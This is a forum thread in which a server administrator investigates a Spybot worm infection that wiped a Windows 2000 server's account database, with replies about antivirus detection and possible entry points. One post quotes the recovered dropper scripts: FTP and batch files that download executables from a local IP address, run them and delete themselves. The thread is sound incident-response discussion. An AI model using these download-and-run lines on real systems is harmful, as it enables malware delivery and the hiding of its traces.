micro32.exe

  • Thread starter Thread starter John Coutts
  • Start date Start date
J

John Coutts

Just discovered a virus that I am having a little difficulty in identifying.

On a 2000 server that I maintain remotely, I logged in to do some system
maintenance yesterday. When I logged out, the system shut down. Today, we
brought the system back up, and I could connect remotely via pcAnywhere, but I
could not login. Every UserID and password I tried would not work. Finally in
frustration, I tried a blank password to the administrator account. All the SAM
database has been wiped out. After rebuilding all the security settings, I then
started to look for the culprit. It appears the virus was activated when I
logged into the server, as there is an application log entry saying that the
system could not update my user settings when I logged out.

What I found was <micro32.exe> in the WINNT\SYSTEM32 directory as a
System/Hidden/ReadOnly file. It does not get indentified when scanned by NAV,
and I have not been able to find any information on it. It seems somewhat
similar to WORM_RBOT.KI identified by TREND Micro, in that it was stored in the
registry under the name Microsoft Micro Protection Subsystems (similar to
Microsoft Protection Subsystems), but that is where the similarity ends. The
file name and size are both different.

Can anyone shed some light?

J.A. Coutts
 
John Coutts said:
Just discovered a virus that I am having a little difficulty in identifying.

On a 2000 server that I maintain remotely, I logged in to do some system
maintenance yesterday. When I logged out, the system shut down. Today, we
brought the system back up, and I could connect remotely via pcAnywhere, but I
could not login. Every UserID and password I tried would not work. Finally in
frustration, I tried a blank password to the administrator account. All the SAM
database has been wiped out. After rebuilding all the security settings, I then
started to look for the culprit. It appears the virus was activated when I
logged into the server, as there is an application log entry saying that the
system could not update my user settings when I logged out.

What I found was <micro32.exe> in the WINNT\SYSTEM32 directory as a
System/Hidden/ReadOnly file. It does not get indentified when scanned by NAV,
and I have not been able to find any information on it. It seems somewhat
similar to WORM_RBOT.KI identified by TREND Micro, in that it was stored in the
registry under the name Microsoft Micro Protection Subsystems (similar to
Microsoft Protection Subsystems), but that is where the similarity ends. The
file name and size are both different.

Can anyone shed some light?

J.A. Coutts
Click to expand...

Send it to NAV for investigation.
 
On that special day, John Coutts, ([email protected])
said...


Hmm, SAM database? Does that mean, there is something installed on the
computer, that is based on the MDAC service? That may have been the way
this thing got in.

http://www.microsoft.com/security/bulletins/200211_windows.mspx


Gabriele Neukam

(e-mail address removed)
Click to expand...
************** REPLY SEPARATER ****************
FYI: The SAM database is the encrypted database that NT/2000/XP uses to store
the UserID/Password information. It has nothing to do with database access.
 
On that special day, John Coutts, ([email protected])
said...
FYI: The SAM database is the encrypted database that NT/2000/XP uses to store
the UserID/Password information. It has nothing to do with database access.
Click to expand...

Ok, then I was wrong. Sorry for the misconception.


Gabriele Neukam

(e-mail address removed)
 
Just discovered a virus that I am having a little difficulty in identifying.

J.A. Coutts
Click to expand...
******************** SEPARATER ***********************
Heard back from Symantec this morning. They say that this virus belongs to the
W32.Spybot.Worm family and is unrepairable (full text below). Now the question
is how did this worm get on this machine. Spybot is supposed to be spread via
KaZaA and mIRC. This is a W2K server operating behind a firewall. The only port
accesible to the outside world is port 80 and the pcAnywhere ports. It is also
the only NT syle machine on this network (the rest are ME), and none of the
rest seem to be infected. I found some interesting scripts (dated the day
before the crash) in the system directory that may provide a clue.

** .pif **
open 192.168.1.13 18600
user a a
binary
GET crss.exe
bye

** c.bat **
@echo off
ftp -n -v -s:.pif
crss.exe
del .pif
del /F c.bat
exit /y

** o **
open 192.168.1.13 22327
user 1 1
get bling.exe
quit

** crss.exe **
--zero length--

IP 192.168.1.13 does not exist on this network. It is however the next
available DHCP served address. It is beginning to look like someone physically
connected to this network in order to accomplish this deed (and no it is not a
wireless network). It is quite possible that the crash simply occurred because
of a poorly behaving worm.

J.A. Coutts
--------------------------------------------------------------------
Dear (e-mail address removed),

We have analyzed your submission. The following is a report of our
findings for each file you have submitted:

filename: C:\Temp\scan\micro32.exe
machine: ERNIE
result: This file is infected with W32.Spybot.Worm

Developer notes:
C:\Temp\scan\micro32.exe is non-repairable threat. NAV with the latest
rapidrelease definition detects this. Please delete this file and replace it
if neccessary. Please follow the instruction at the end of this email message
to install the latest rapidrelease definitions.

Symantec Security Response has determined that the sample(s) that you provided
are infected with a virus, worm, or Trojan. We have created RapidRelease
definitions that will detect this threat. Please follow the instruction at the
end of this email message to download and install the latest RapidRelease
definitions.
Symantec is now building a new set of definitions to include the threat you
have submitted. The approximate time to complete this process is one hour. We
recommend checking the ftp site periodically over the next 60 to 90 minutes to
download these definitions as soon as they are available.
-----------------------------------------------------------------
 
(e-mail address removed) (John Coutts) wrote in
Spybot is supposed to be spread via
KaZaA and mIRC
Click to expand...

I dont think its spread via those, but it does try to make contact with an
irc chatroom for commands... at least the version I got did. Afterwards
someone on the outside accessed me via tftp.exe until I got suspicious and
blocked it off (I was doing windows update at the time and thought the
firewall warnings I was getting was part of it). I never heard of tftp
before but it is an ms program. Its no longer permitted access anywhere,
even on private IPs... nothing seems to miss it.

As for Norton. It didnt catch the trojan. I found, renamed, and moved it
then and sent it to them, like you did. They identified it as the same
thing and sent me the same emails, and NAV still didnt identify it a week
and 3 updates later. Bit Defender did. Go figure.
 
Heard back from Symantec this morning. They say that this virus belongs to the
W32.Spybot.Worm family and is unrepairable (full text below). Now the question
is how did this worm get on this machine. Spybot is supposed to be spread via
KaZaA and mIRC. This is a W2K server operating behind a firewall. The only port
accesible to the outside world is port 80 and the pcAnywhere ports. It is also
the only NT syle machine on this network (the rest are ME), and none of the
Click to expand...

From the Symantec write up on
http://securityresponse.symantec.com/avcenter/venc/data/w32.spybot.worm.html

|Newer variants may also spread by exploiting the following vulnerabilities:
<snip>
|The WebDav Vulnerability (described in Microsoft Security Bulletin MS03-007) using TCP port 80.

From M$'s bulletin at
http://www.microsoft.com/technet/security/bulletin/MS03-007.mspx

|Impact of vulnerability:
|Run code of attacker's choice
|Maximum Severity Rating:
|Critical
|Recommendation:
|Systems administrators should apply the patch immediately

They have a link to the patch
http://www.microsoft.com/downloads/...45-5145-4844-B62E-C69D32AC929B&displaylang=en

Regards, Dave Hodgins
 
I dont think its spread via those, but it does try to make contact with an
irc chatroom for commands... at least the version I got did. Afterwards
someone on the outside accessed me via tftp.exe until I got suspicious and
blocked it off (I was doing windows update at the time and thought the
firewall warnings I was getting was part of it). I never heard of tftp
before but it is an ms program. Its no longer permitted access anywhere,
even on private IPs... nothing seems to miss it.

As for Norton. It didnt catch the trojan. I found, renamed, and moved it
then and sent it to them, like you did. They identified it as the same
thing and sent me the same emails, and NAV still didnt identify it a week
and 3 updates later. Bit Defender did. Go figure.
Click to expand...
******************* REPLY SWEPARATER ********************
Downloaded and installed the latest update (09/11/2004). It now detects as
W32.Spybot.Worm. Unfortunately, the description on this virus is very generic,
and really doesn't really help me very much. Even with all the vulnerabilities
in Windows 2000 (I admit this server was not fully patched), the only way into
this server was through port 80 or on the local network. The evidence points to
the local network.

J.A. Coutts
 
(e-mail address removed) (John Coutts) wrote in
Downloaded and installed the latest update (09/11/2004). It now
detects as W32.Spybot.Worm. Unfortunately, the description on this
virus is very generic, and really doesn't really help me very much.
Even with all the vulnerabilities in Windows 2000 (I admit this server
was not fully patched), the only way into this server was through port
80 or on the local network. The evidence points to the local network.

J.A. Coutts
Click to expand...

I guess it does spread through kazaa. I dont use it myself. But you could
be right and someone inside downloaded a crack or other small program and
ran it.

Do you run shieldsup to be sure no other port is open?

This was on the symantec page?
http://securityresponse.symantec.com/avcenter/venc/data/w32.spybot.worm.ht
ml
(cut & paste url - 2 lines)

The WebDav Vulnerability (described in Microsoft Security Bulletin MS03-
007) using TCP port 80.

So maybe it was that.
 
SWEPERATOR?? That's new!



| ******************* REPLY SWEPARATER ********************
| Downloaded and installed the latest update (09/11/2004). It now detects as
| W32.Spybot.Worm. Unfortunately, the description on this virus is very
generic,
| and really doesn't really help me very much. Even with all the
vulnerabilities
| in Windows 2000 (I admit this server was not fully patched), the only way
into
| this server was through port 80 or on the local network. The evidence
points to
| the local network.
|
| J.A. Coutts
|
 
Heard back from Symantec this morning. They say that this virus belongs to the
W32.Spybot.Worm family and is unrepairable (full text below). Now the question
is how did this worm get on this machine. Spybot is supposed to be spread via
KaZaA and mIRC. This is a W2K server operating behind a firewall. The only port
accesible to the outside world is port 80 and the pcAnywhere ports. It is also
the only NT syle machine on this network (the rest are ME), and none of the
rest seem to be infected. I found some interesting scripts (dated the day
before the crash) in the system directory that may provide a clue.
Click to expand...
****************** SEPARATER ******************
Mystery solved. It just so happens that a Western Union representative was in
that particular day (Sep. 7) and connected to the network with a Notebook
computer. It was likely the DDCOM vulnerability that allowed the virus to be
loaded on the server.

J.A. Coutts
 
(e-mail address removed) (John Coutts) wrote in
Mystery solved. It just so happens that a Western Union representative
was in that particular day (Sep. 7) and connected to the network with
a Notebook computer. It was likely the DDCOM vulnerability that
allowed the virus to be loaded on the server.
Click to expand...

its microsofts fault :P
 
On that special day, John Coutts, ([email protected])
said...
It just so happens that a Western Union representative was in
that particular day (Sep. 7) and connected to the network with a Notebook
computer.
Click to expand...

Sue him. And patch your server.


Gabriele Neukam

(e-mail address removed)
 
Back
Top